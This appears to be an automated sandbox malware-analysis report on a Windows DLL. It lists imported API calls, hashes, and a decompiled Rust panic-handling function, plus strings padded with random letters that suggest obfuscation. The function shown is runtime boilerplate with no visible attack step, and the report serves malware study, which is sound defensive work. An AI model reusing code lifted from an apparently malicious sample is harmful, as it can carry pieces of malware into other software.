                          • GetCurrentProcess.KERNEL32(?), ref: 6ECDE1E1
                          • GetCurrentThread.KERNEL32 ref: 6ECDE1E9
                          • RtlCaptureContext.KERNEL32(?), ref: 6ECDE209
                          • GetProcAddress.KERNEL32(SymFunctionTableAccess64,?), ref: 6ECDE24A
                          • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6ECDE274
                          • GetCurrentProcess.KERNEL32 ref: 6ECDE289
                          • GetProcAddress.KERNEL32(StackWalkEx), ref: 6ECDE2AB
                          • ReleaseMutex.KERNEL32(?), ref: 6ECDE398
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECDE41B
                          • HeapFree.KERNEL32(00000000,?,?), ref: 6ECDE44D
                          • GetProcAddress.KERNEL32(StackWalk64), ref: 6ECDE4F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeHeap$AddressCurrentErrorLastProc$Process$CaptureContextDirectoryMutexReleaseThread
                          • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$called `Option::unwrap()` on a `None` value
                          • API String ID: 1381040140-1036201984
                          • Opcode ID: 4684716b9897f53484347832e253adfa1106237a29cef055a9d3cd590a99d7d4
                          • Instruction ID: 8de080832b58f426c96d0a70e7f468c3cc97a69ba5982230c040036e882c9d5c
                          • Opcode Fuzzy Hash: 4684716b9897f53484347832e253adfa1106237a29cef055a9d3cd590a99d7d4
                          • Instruction Fuzzy Hash: 121237B1A00B009FE761CFA5C994B97BBF5BF09308F00491DD6AA87A90E776B449CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC8C0, Relevance: 32.0, APIs: 14, Strings: 4, Instructions: 477memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E6ECDC8C0(long _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t190;
				void* _t194;
				void _t195;
				intOrPtr* _t196;
				signed int _t197;
				signed int _t199;
				char* _t201;
				long _t202;
				long _t203;
				void* _t204;
				void* _t205;
				long _t206;
				void _t209;
				void _t210;
				void* _t219;
				void* _t222;
				long _t226;
				void* _t235;
				void* _t245;
				void* _t247;
				void* _t248;
				char** _t251;
				char** _t252;
				void* _t256;
				void* _t260;
				void _t264;
				char _t265;
				signed char _t267;
				void _t270;
				intOrPtr _t273;
				void* _t275;
				char* _t276;
				void _t277;
				void* _t280;
				intOrPtr _t291;
				intOrPtr _t295;
				void _t298;
				long _t302;
				void* _t307;
				void* _t308;
				void* _t309;
				signed int _t310;
				signed int _t312;
				void* _t318;
				intOrPtr* _t324;
				long _t326;
				void* _t327;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;
				intOrPtr _t336;
				void* _t347;
				void* _t360;
				long _t361;

				_v32 = _t336;
				_v20 = 0xffffffff;
				_v24 = E6ECE3B50;
				_t264 = _t270;
				_t332 = 1;
				_t330 = _t307;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				asm("lock xadd [0x6ed2adc0], esi");
				_t190 = E6ECDD1B0(_t264, _t330);
				_t337 = _t190;
				if(_t190 == 0) {
					_t190 = E6ECF6EE0(_t264,  &M6ED1D0E7, 0x46, _t337,  &_v68, 0x6ed1d060, 0x6ed1d1ac);
					_t336 = _t336 + 0xc;
					asm("ud2");
				}
				_t308 = _a8;
				_t273 =  *_t190 + 1;
				 *_t190 = _t273;
				if(_t332 < 0 || _t273 >= 3) {
					__eflags = _t273 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6ed1cd60;
						_v120 = 0x6ed1d014;
						_v68 = 0x6ed1da50;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t308;
						_t309 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6ECD2640;
						_v52 =  &_v80;
						_v48 = 1;
						_t194 = E6ECDD2A0( &_v100, __eflags);
						__eflags = _t194 - 3;
						if(_t194 == 3) {
							_v20 = 0;
							_v36 = _t309;
							 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))( *_t309);
							_t336 = _t336 + 4;
							L11:
							_t332 = _v36;
							_t302 =  *(_t332 + 4);
							__eflags =  *(4 + _t302);
							if( *(4 + _t302) != 0) {
								_t256 =  *_t332;
								__eflags =  *((intOrPtr*)(_t302 + 8)) - 9;
								if( *((intOrPtr*)(_t302 + 8)) >= 9) {
									_t256 =  *(_t256 - 4);
								}
								HeapFree( *0x6ed2adc8, 0, _t256);
							}
							_t194 = HeapFree( *0x6ed2adc8, 0, _t332);
						}
						goto L16;
					}
					_t327 =  &_v68;
					_v68 = 0x6ed1da14;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6ed1cd60;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t194 = E6ECDD2A0( &_v124, __eflags);
					__eflags = _t194 - 3;
					if(_t194 != 3) {
						goto L16;
					} else {
						_v20 = 1;
						_v36 = _t327;
						 *((intOrPtr*)( *((intOrPtr*)(_t327 + 4))))( *_t327);
						_t336 = _t336 + 4;
						goto L11;
					}
				} else {
					_v132 = _t273;
					__imp__AcquireSRWLockShared(0x6ed2adbc);
					_v144 = 0x6ed2adbc;
					_v20 = 2;
					_v136 = _t264;
					_v140 = _t330;
					_t260 =  *((intOrPtr*)(_t330 + 0x10))(_t264);
					_t336 = _t336 + 4;
					_v36 = _t260;
					_v40 = _t308;
					_t194 = E6ECDD1B0(_t264, _t330);
					_t330 = _v40;
					_t340 = _t194;
					if(_t194 != 0) {
						L17:
						__eflags =  *_t194 - 1;
						_t275 = 1;
						if( *_t194 <= 1) {
							_t195 =  *0x6ed2adb0; // 0x0
							_t310 = _a8;
							__eflags = _t195 - 2;
							if(_t195 == 2) {
								_t275 = 0;
								goto L19;
							}
							__eflags = _t195 - 1;
							if(_t195 == 1) {
								_t275 = 4;
								goto L19;
							}
							__eflags = _t195;
							if(_t195 != 0) {
								goto L19;
							}
							E6ECDD530(_t264,  &_v68, _t330, _t332);
							_t330 = _v40;
							_t248 = _v68;
							__eflags = _t248;
							if(_t248 != 0) {
								goto L68;
							}
							_t267 = 5;
							goto L86;
						}
						_t310 = _a8;
						goto L19;
					} else {
						E6ECF6EE0(_t264,  &M6ED1D0E7, 0x46, _t340,  &_v68, 0x6ed1d060, 0x6ed1d1ac);
						_t336 = _t336 + 0xc;
						L61:
						asm("ud2");
						L62:
						_t276 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t201 = 0xc;
						L21:
						_v100 = _t276;
						_v96 = _t201;
						_t202 =  *0x6ed2a044; // 0x0
						if(_t202 == 0) {
							_t280 = 0x6ed2a044;
							_t202 = E6ECE2B10(_t264, 0x6ed2a044, _t330, _t332);
						}
						_t194 = TlsGetValue(_t202);
						if(_t194 <= 1) {
							L42:
							_t203 =  *0x6ed2a044; // 0x0
							__eflags = _t203;
							if(_t203 == 0) {
								_t280 = 0x6ed2a044;
								_t203 = E6ECE2B10(_t264, 0x6ed2a044, _t330, _t332);
							}
							_t194 = TlsGetValue(_t203);
							__eflags = _t194;
							if(_t194 == 0) {
								_t204 =  *0x6ed2adc8;
								__eflags = _t204;
								if(_t204 != 0) {
									L66:
									_t205 = HeapAlloc(_t204, 0, 0x10);
									__eflags = _t205;
									if(__eflags != 0) {
										 *_t205 = 0;
										 *(_t205 + 0xc) = 0x6ed2a044;
										_t332 = _t205;
										_t206 =  *0x6ed2a044; // 0x0
										__eflags = _t206;
										if(_t206 == 0) {
											_v36 = _t332;
											_t206 = E6ECE2B10(_t264, 0x6ed2a044, _t330, _t332);
											_t332 = _v36;
										}
										_t194 = TlsSetValue(_t206, _t332);
										goto L75;
									}
									L67:
									_t248 = E6ECF6C30(_t264, 0x10, 4, _t330, _t332, __eflags);
									asm("ud2");
									L68:
									_t326 = _v60;
									_t298 = _v64;
									__eflags = _t326 - 4;
									if(_t326 == 4) {
										__eflags =  *_t248 - 0x6c6c7566;
										if( *_t248 != 0x6c6c7566) {
											L83:
											_t332 = 2;
											_t267 = 0;
											__eflags = 0;
											L84:
											__eflags = _t298;
											if(_t298 != 0) {
												HeapFree( *0x6ed2adc8, 0, _t248);
											}
											L86:
											__eflags = _t267 - 5;
											_t310 = _a8;
											_t269 =  !=  ? _t332 : 1;
											_t275 =  !=  ? _t267 & 0x000000ff : 4;
											_t142 =  !=  ? _t332 : 1;
											_t264 =  *0x6ed2adb0;
											 *0x6ed2adb0 =  !=  ? _t332 : 1;
											L19:
											_v148 = _t310;
											_v128 = _t275;
											_t59 = _t330 + 0xc; // 0x6ece3440
											_t196 =  *_t59;
											_v40 = _t196;
											_t197 =  *_t196(_v36);
											_t336 = _t336 + 4;
											_t312 = _t310 ^ 0x7ef2a91e | _t197 ^ 0xecc7bcf4;
											__eflags = _t312;
											if(__eflags != 0) {
												_t199 = _v40(_v36);
												_t336 = _t336 + 4;
												__eflags = _t312 ^ 0xe43a67d8 | _t199 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L62;
												}
												_t251 = _v36;
												_t276 =  *_t251;
												_t201 = _t251[2];
												goto L21;
											}
											_t252 = _v36;
											_t276 =  *_t252;
											_t201 = _t252[1];
											goto L21;
										}
										_t267 = 1;
										_t332 = 3;
										goto L84;
									}
									__eflags = _t326 - 1;
									if(_t326 != 1) {
										goto L83;
									}
									__eflags =  *_t248 - 0x30;
									if( *_t248 != 0x30) {
										goto L83;
									}
									_t267 = 4;
									_t332 = 1;
									goto L84;
								}
								_t204 = GetProcessHeap();
								__eflags = _t204;
								if(__eflags == 0) {
									goto L67;
								}
								 *0x6ed2adc8 = _t204;
								goto L66;
							} else {
								_t332 = _t194;
								__eflags = _t194 - 1;
								if(_t194 != 1) {
									L75:
									_t277 =  *(_t332 + 8);
									__eflags =  *_t332;
									_t136 = _t332 + 4; // 0x4
									_t330 = _t136;
									 *_t332 = 1;
									 *(_t332 + 4) = 0;
									 *(_t332 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t277;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t194 = E6ECDC800(_t277);
											}
										}
									}
									goto L26;
								}
								_v84 = 0;
								_v36 = 0;
								_t210 = 0;
								__eflags = 0;
								goto L47;
							}
						} else {
							_t330 = _t194;
							if( *_t194 != 1) {
								goto L42;
							}
							_t330 = _t330 + 4;
							L26:
							if( *_t330 != 0) {
								E6ECF6EE0(_t264, "already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl", 0x10, __eflags,  &_v68, 0x6ed1d050, 0x6ed1d720);
								_t336 = _t336 + 0xc;
								goto L61;
							}
							 *_t330 = 0xffffffff;
							_t332 =  *(_t330 + 4);
							if(_t332 == 0) {
								_v36 = _t330;
								_v20 = 8;
								_t247 = E6ECDC690(_t264, _t330, _t332);
								_t330 = _v36;
								_t332 = _t247;
								_t194 =  *(_t330 + 4);
								_t347 = _t194;
								if(_t347 != 0) {
									asm("lock dec dword [eax]");
									if(_t347 == 0) {
										_t280 =  *(_t330 + 4);
										_t194 = E6ECDC800(_t280);
									}
								}
								 *(_t330 + 4) = _t332;
							}
							asm("lock inc dword [esi]");
							if(_t347 <= 0) {
								L16:
								asm("ud2");
								asm("ud2");
								goto L17;
							} else {
								 *_t330 =  *_t330 + 1;
								_v84 = _t332;
								_v36 = _t332;
								if(_t332 != 0) {
									_t209 =  *(_t332 + 0x10);
									__eflags = _t209;
									_t280 =  ==  ? _t209 : _t332 + 0x10;
									if(__eflags != 0) {
										L103:
										_t210 =  *_t280;
										_t280 =  *((intOrPtr*)(_t280 + 4)) - 1;
										L104:
										_v20 = 3;
										L47:
										_v124 = 0x6ed1d8fc;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t317 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t212 =  !=  ? _t280 : 9;
										_v80 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t318 =  &_v124;
										_v76 =  !=  ? _t280 : 9;
										_v68 =  &_v80;
										_v64 = 0x6ecdde50;
										_v60 =  &_v100;
										_v56 = 0x6ecdde50;
										_v52 =  &_v148;
										_v48 = E6ECDDE70;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6ECDD2A0( &_v92, _t210) == 3) {
											_v20 = 7;
											_v40 = _t318;
											 *((intOrPtr*)( *((intOrPtr*)(_t318 + 4))))( *_t318);
											_t336 = _t336 + 4;
											_t335 = _v40;
											_t295 =  *((intOrPtr*)(_t335 + 4));
											if( *((intOrPtr*)(_t295 + 4)) != 0) {
												_t245 =  *_t335;
												if( *((intOrPtr*)(_t295 + 8)) >= 9) {
													_t245 =  *(_t245 - 4);
												}
												HeapFree( *0x6ed2adc8, 0, _t245);
											}
											HeapFree( *0x6ed2adc8, 0, _t335);
										}
										_t265 = _v128;
										_t219 =  <  ? (_t265 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t219 == 0) {
											__imp__AcquireSRWLockExclusive(0x6ed2adac);
											_v68 = 0x6ed1d2c0;
											_v64 = 1;
											_v152 = 0x6ed2adac;
											_v41 = _t265;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6ECDDEE0;
											_v52 =  &_v124;
											_v48 = 1;
											_t222 = E6ECDD2A0( &_v92, __eflags);
											_t333 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6ed2adac);
											__eflags = _t222 - 3;
											if(__eflags != 0) {
												goto L94;
											}
											_v20 = 5;
											_v40 = _t333;
											 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
											_t336 = _t336 + 4;
											goto L89;
										} else {
											if(_t219 == 1) {
												L94:
												_t360 = _v36;
												if(_t360 != 0) {
													asm("lock dec dword [eax]");
													if(_t360 == 0) {
														E6ECDC800(_v84);
													}
												}
												_t334 = _v140;
												_t331 = _v136;
												_t361 = _v72;
												if(_t361 != 0) {
													asm("lock dec dword [eax]");
													if(_t361 == 0) {
														E6ECDDC20(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6ed2adbc);
												_t362 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6ed1da8c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6ed1cd60;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t226 = E6ECDD2A0( &_v80, _t362);
													_v120 =  &_v68;
													_v124 = _t226;
													E6ECDD460( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t280 = _t331;
												E6ECDD440(_t280, _t334);
												asm("ud2");
												goto L103;
											}
											 *0x6ed2a040 = 0;
											_t356 =  *0x6ed2a040;
											if( *0x6ed2a040 == 0) {
												goto L94;
											}
											_t324 =  &_v68;
											_v68 = 0x6ed1d96c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6ed1cd60;
											_v48 = 0;
											_v20 = 3;
											if(E6ECDD2A0( &_v92, _t356) != 3) {
												goto L94;
											}
											_v40 = _t324;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t336 = _t336 + 4;
											L89:
											_t291 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t291 + 4)) != 0) {
												_t235 =  *_v40;
												if( *((intOrPtr*)(_t291 + 8)) >= 9) {
													_t235 =  *(_t235 - 4);
												}
												HeapFree( *0x6ed2adc8, 0, _t235);
											}
											HeapFree( *0x6ed2adc8, 0, _v40);
											goto L94;
										}
									}
									_t210 = 0;
									goto L104;
								}
								_t210 = 0;
								goto L47;
							}
						}
					}
				}
			}






























































































                          0x6ecdc8cc
                          0x6ecdc8cf
                          0x6ecdc8d6
                          0x6ecdc8dd
                          0x6ecdc8e2
                          0x6ecdc8e7
                          0x6ecdc8f0
                          0x6ecdc8f3
                          0x6ecdc8f9
                          0x6ecdc901
                          0x6ecdc906
                          0x6ecdc908
                          0x6ecdc922
                          0x6ecdc927
                          0x6ecdc92a
                          0x6ecdc92a
                          0x6ecdc92e
                          0x6ecdc931
                          0x6ecdc934
                          0x6ecdc936
                          0x6ecdc9aa
                          0x6ecdc9ad
                          0x6ecdca0a
                          0x6ecdca11
                          0x6ecdca1b
                          0x6ecdca22
                          0x6ecdca29
                          0x6ecdca2d
                          0x6ecdca34
                          0x6ecdca3b
                          0x6ecdca41
                          0x6ecdca44
                          0x6ecdca47
                          0x6ecdca4d
                          0x6ecdca54
                          0x6ecdca57
                          0x6ecdca5e
                          0x6ecdca63
                          0x6ecdca65
                          0x6ecdca6c
                          0x6ecdca74
                          0x6ecdca77
                          0x6ecdca79
                          0x6ecdca7c
                          0x6ecdca7c
                          0x6ecdca7f
                          0x6ecdca82
                          0x6ecdca86
                          0x6ecdca88
                          0x6ecdca8a
                          0x6ecdca8e
                          0x6ecdca90
                          0x6ecdca90
                          0x6ecdca9c
                          0x6ecdca9c
                          0x6ecdcaaa
                          0x6ecdcaaa
                          0x00000000
                          0x6ecdca65
                          0x6ecdc9b2
                          0x6ecdc9b5
                          0x6ecdc9bc
                          0x6ecdc9c3
                          0x6ecdc9ca
                          0x6ecdc9d1
                          0x6ecdc9d5
                          0x6ecdc9dc
                          0x6ecdc9e3
                          0x6ecdc9e8
                          0x6ecdc9ea
                          0x00000000
                          0x6ecdc9f0
                          0x6ecdc9f5
                          0x6ecdc9fd
                          0x6ecdca00
                          0x6ecdca02
                          0x00000000
                          0x6ecdca02
                          0x6ecdc93d
                          0x6ecdc93d
                          0x6ecdc945
                          0x6ecdc94b
                          0x6ecdc955
                          0x6ecdc95c
                          0x6ecdc963
                          0x6ecdc969
                          0x6ecdc96c
                          0x6ecdc96f
                          0x6ecdc972
                          0x6ecdc975
                          0x6ecdc97a
                          0x6ecdc97d
                          0x6ecdc97f
                          0x6ecdcab3
                          0x6ecdcab3
                          0x6ecdcab6
                          0x6ecdcab8
                          0x6ecdcb8b
                          0x6ecdcb90
                          0x6ecdcb93
                          0x6ecdcb96
                          0x6ecdcd97
                          0x00000000
                          0x6ecdcd97
                          0x6ecdcb9c
                          0x6ecdcb9f
                          0x6ecdcd90
                          0x00000000
                          0x6ecdcd90
                          0x6ecdcba5
                          0x6ecdcba7
                          0x00000000
                          0x00000000
                          0x6ecdcbb0
                          0x6ecdcbb5
                          0x6ecdcbb8
                          0x6ecdcbbb
                          0x6ecdcbbd
                          0x00000000
                          0x00000000
                          0x6ecdcbc3
                          0x00000000
                          0x6ecdcbc3
                          0x6ecdcabe
                          0x00000000
                          0x6ecdc985
                          0x6ecdc99d
                          0x6ecdc9a2
                          0x6ecdcdbe
                          0x6ecdcdbe
                          0x6ecdcdc0
                          0x6ecdcdc0
                          0x6ecdcdc5
                          0x6ecdcaf3
                          0x6ecdcaf3
                          0x6ecdcaf6
                          0x6ecdcaf9
                          0x6ecdcb00
                          0x6ecdcb02
                          0x6ecdcb07
                          0x6ecdcb07
                          0x6ecdcb0d
                          0x6ecdcb16
                          0x6ecdcbf3
                          0x6ecdcbf3
                          0x6ecdcbf8
                          0x6ecdcbfa
                          0x6ecdcbfc
                          0x6ecdcc01
                          0x6ecdcc01
                          0x6ecdcc07
                          0x6ecdcc0d
                          0x6ecdcc0f
                          0x6ecdcdcf
                          0x6ecdcdd4
                          0x6ecdcdd6
                          0x6ecdcde6
                          0x6ecdcdeb
                          0x6ecdcdf0
                          0x6ecdcdf2
                          0x6ecdce32
                          0x6ecdce38
                          0x6ecdce3f
                          0x6ecdce41
                          0x6ecdce46
                          0x6ecdce48
                          0x6ecdce4f
                          0x6ecdce52
                          0x6ecdce57
                          0x6ecdce57
                          0x6ecdce5c
                          0x00000000
                          0x6ecdce5c
                          0x6ecdcdf4
                          0x6ecdcdfe
                          0x6ecdce03
                          0x6ecdce05
                          0x6ecdce05
                          0x6ecdce08
                          0x6ecdce0b
                          0x6ecdce0e
                          0x6ecdceb8
                          0x6ecdcebe
                          0x6ecdcec9
                          0x6ecdcec9
                          0x6ecdcece
                          0x6ecdcece
                          0x6ecdced0
                          0x6ecdced0
                          0x6ecdced2
                          0x6ecdcedd
                          0x6ecdcedd
                          0x6ecdcee2
                          0x6ecdcee2
                          0x6ecdceed
                          0x6ecdcef5
                          0x6ecdcef8
                          0x6ecdcefb
                          0x6ecdcefb
                          0x6ecdcefb
                          0x6ecdcac1
                          0x6ecdcac1
                          0x6ecdcac7
                          0x6ecdcaca
                          0x6ecdcaca
                          0x6ecdcad0
                          0x6ecdcad3
                          0x6ecdcad5
                          0x6ecdcae3
                          0x6ecdcae3
                          0x6ecdcae5
                          0x6ecdcbcd
                          0x6ecdcbd0
                          0x6ecdcbde
                          0x6ecdcbe0
                          0x00000000
                          0x00000000
                          0x6ecdcbe6
                          0x6ecdcbe9
                          0x6ecdcbeb
                          0x00000000
                          0x6ecdcbeb
                          0x6ecdcaeb
                          0x6ecdcaee
                          0x6ecdcaf0
                          0x00000000
                          0x6ecdcaf0
                          0x6ecdcec0
                          0x6ecdcec2
                          0x00000000
                          0x6ecdcec2
                          0x6ecdce14
                          0x6ecdce17
                          0x00000000
                          0x00000000
                          0x6ecdce1d
                          0x6ecdce20
                          0x00000000
                          0x00000000
                          0x6ecdce26
                          0x6ecdce28
                          0x00000000
                          0x6ecdce28
                          0x6ecdcdd8
                          0x6ecdcddd
                          0x6ecdcddf
                          0x00000000
                          0x00000000
                          0x6ecdcde1
                          0x00000000
                          0x6ecdcc15
                          0x6ecdcc15
                          0x6ecdcc17
                          0x6ecdcc1a
                          0x6ecdce62
                          0x6ecdce62
                          0x6ecdce65
                          0x6ecdce68
                          0x6ecdce68
                          0x6ecdce6b
                          0x6ecdce71
                          0x6ecdce78
                          0x6ecdce7f
                          0x6ecdce85
                          0x6ecdce87
                          0x6ecdce8d
                          0x6ecdce90
                          0x6ecdce96
                          0x6ecdce96
                          0x6ecdce90
                          0x6ecdce87
                          0x00000000
                          0x6ecdce7f
                          0x6ecdcc20
                          0x6ecdcc27
                          0x6ecdcc2e
                          0x6ecdcc2e
                          0x00000000
                          0x6ecdcc2e
                          0x6ecdcb1c
                          0x6ecdcb1f
                          0x6ecdcb21
                          0x00000000
                          0x00000000
                          0x6ecdcb27
                          0x6ecdcb2a
                          0x6ecdcb2d
                          0x6ecdcdb6
                          0x6ecdcdbb
                          0x00000000
                          0x6ecdcdbb
                          0x6ecdcb33
                          0x6ecdcb39
                          0x6ecdcb3e
                          0x6ecdcb40
                          0x6ecdcb43
                          0x6ecdcb4a
                          0x6ecdcb4f
                          0x6ecdcb52
                          0x6ecdcb54
                          0x6ecdcb57
                          0x6ecdcb59
                          0x6ecdcb5b
                          0x6ecdcb5e
                          0x6ecdcb60
                          0x6ecdcb63
                          0x6ecdcb63
                          0x6ecdcb5e
                          0x6ecdcb68
                          0x6ecdcb68
                          0x6ecdcb6b
                          0x6ecdcb6e
                          0x6ecdcaaf
                          0x6ecdcaaf
                          0x6ecdcab1
                          0x00000000
                          0x6ecdcb74
                          0x6ecdcb74
                          0x6ecdcb78
                          0x6ecdcb7b
                          0x6ecdcb7e
                          0x6ecdcea0
                          0x6ecdcea6
                          0x6ecdcea8
                          0x6ecdceab
                          0x6ecdd062
                          0x6ecdd062
                          0x6ecdd067
                          0x6ecdd068
                          0x6ecdd068
                          0x6ecdcc30
                          0x6ecdcc37
                          0x6ecdcc3e
                          0x6ecdcc45
                          0x6ecdcc4c
                          0x6ecdcc50
                          0x6ecdcc57
                          0x6ecdcc5e
                          0x6ecdcc65
                          0x6ecdcc6d
                          0x6ecdcc70
                          0x6ecdcc76
                          0x6ecdcc79
                          0x6ecdcc7f
                          0x6ecdcc85
                          0x6ecdcc8c
                          0x6ecdcc95
                          0x6ecdcc9c
                          0x6ecdcca2
                          0x6ecdcca9
                          0x6ecdccac
                          0x6ecdccba
                          0x6ecdccc1
                          0x6ecdccc9
                          0x6ecdcccc
                          0x6ecdccce
                          0x6ecdccd1
                          0x6ecdccd4
                          0x6ecdccdb
                          0x6ecdccdd
                          0x6ecdcce3
                          0x6ecdcce5
                          0x6ecdcce5
                          0x6ecdccf1
                          0x6ecdccf1
                          0x6ecdccff
                          0x6ecdccff
                          0x6ecdcd04
                          0x6ecdcd15
                          0x6ecdcd1a
                          0x6ecdcf0b
                          0x6ecdcf1a
                          0x6ecdcf21
                          0x6ecdcf28
                          0x6ecdcf32
                          0x6ecdcf35
                          0x6ecdcf3c
                          0x6ecdcf43
                          0x6ecdcf49
                          0x6ecdcf50
                          0x6ecdcf53
                          0x6ecdcf5a
                          0x6ecdcf5f
                          0x6ecdcf68
                          0x6ecdcf6e
                          0x6ecdcf71
                          0x00000000
                          0x00000000
                          0x6ecdcf78
                          0x6ecdcf80
                          0x6ecdcf83
                          0x6ecdcf85
                          0x00000000
                          0x6ecdcd20
                          0x6ecdcd23
                          0x6ecdcfc0
                          0x6ecdcfc3
                          0x6ecdcfc5
                          0x6ecdcfc7
                          0x6ecdcfca
                          0x6ecdcfcf
                          0x6ecdcfcf
                          0x6ecdcfca
                          0x6ecdcfd7
                          0x6ecdcfdd
                          0x6ecdcfe3
                          0x6ecdcfe5
                          0x6ecdcfe7
                          0x6ecdcfea
                          0x6ecdcfef
                          0x6ecdcfef
                          0x6ecdcfea
                          0x6ecdcff9
                          0x6ecdcfff
                          0x6ecdd003
                          0x6ecdd00a
                          0x6ecdd012
                          0x6ecdd019
                          0x6ecdd020
                          0x6ecdd027
                          0x6ecdd02e
                          0x6ecdd032
                          0x6ecdd039
                          0x6ecdd040
                          0x6ecdd048
                          0x6ecdd04b
                          0x6ecdd04e
                          0x6ecdd053
                          0x6ecdd055
                          0x6ecdd055
                          0x6ecdd057
                          0x6ecdd05b
                          0x6ecdd060
                          0x00000000
                          0x6ecdd060
                          0x6ecdcd2b
                          0x6ecdcd31
                          0x6ecdcd33
                          0x00000000
                          0x00000000
                          0x6ecdcd3c
                          0x6ecdcd3f
                          0x6ecdcd46
                          0x6ecdcd4d
                          0x6ecdcd54
                          0x6ecdcd5b
                          0x6ecdcd62
                          0x6ecdcd70
                          0x00000000
                          0x00000000
                          0x6ecdcd7b
                          0x6ecdcd7e
                          0x6ecdcd86
                          0x6ecdcd88
                          0x6ecdcf88
                          0x6ecdcf8b
                          0x6ecdcf92
                          0x6ecdcf9b
                          0x6ecdcf9d
                          0x6ecdcf9f
                          0x6ecdcf9f
                          0x6ecdcfab
                          0x6ecdcfab
                          0x6ecdcfbb
                          0x00000000
                          0x6ecdcfbb
                          0x6ecdcd1a
                          0x6ecdceb1
                          0x00000000
                          0x6ecdceb1
                          0x6ecdcb84
                          0x00000000
                          0x6ecdcb84
                          0x6ecdcb6e
                          0x6ecdcb16
                          0x6ecdc97f

                          APIs
                            • Part of subcall function 6ECDD1B0: TlsGetValue.KERNEL32(00000000,00000001,6ECDC906), ref: 6ECDD1BB
                            • Part of subcall function 6ECDD1B0: TlsGetValue.KERNEL32(00000000), ref: 6ECDD1F3
                          • AcquireSRWLockShared.KERNEL32(6ED2ADBC), ref: 6ECDC945
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6ECDCA9C
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECDCAAA
                          • TlsGetValue.KERNEL32(00000000), ref: 6ECDCB0D
                          • TlsGetValue.KERNEL32(00000000), ref: 6ECDCC07
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6ECDCCF1
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECDCCFF
                          • GetProcessHeap.KERNEL32 ref: 6ECDCDD8
                          • HeapAlloc.KERNEL32(011C0000,00000000,00000010), ref: 6ECDCDEB
                          • TlsSetValue.KERNEL32(00000000,00000000,011C0000,00000000,00000010), ref: 6ECDCE5C
                          • HeapFree.KERNEL32(00000000,00000000,011C0000,00000000,00000010), ref: 6ECDCEDD
                          Strings
                          • full, xrefs: 6ECDCEB8
                          • already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl, xrefs: 6ECDCDA1
                          • cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf, xrefs: 6ECDC90D, 6ECDC988
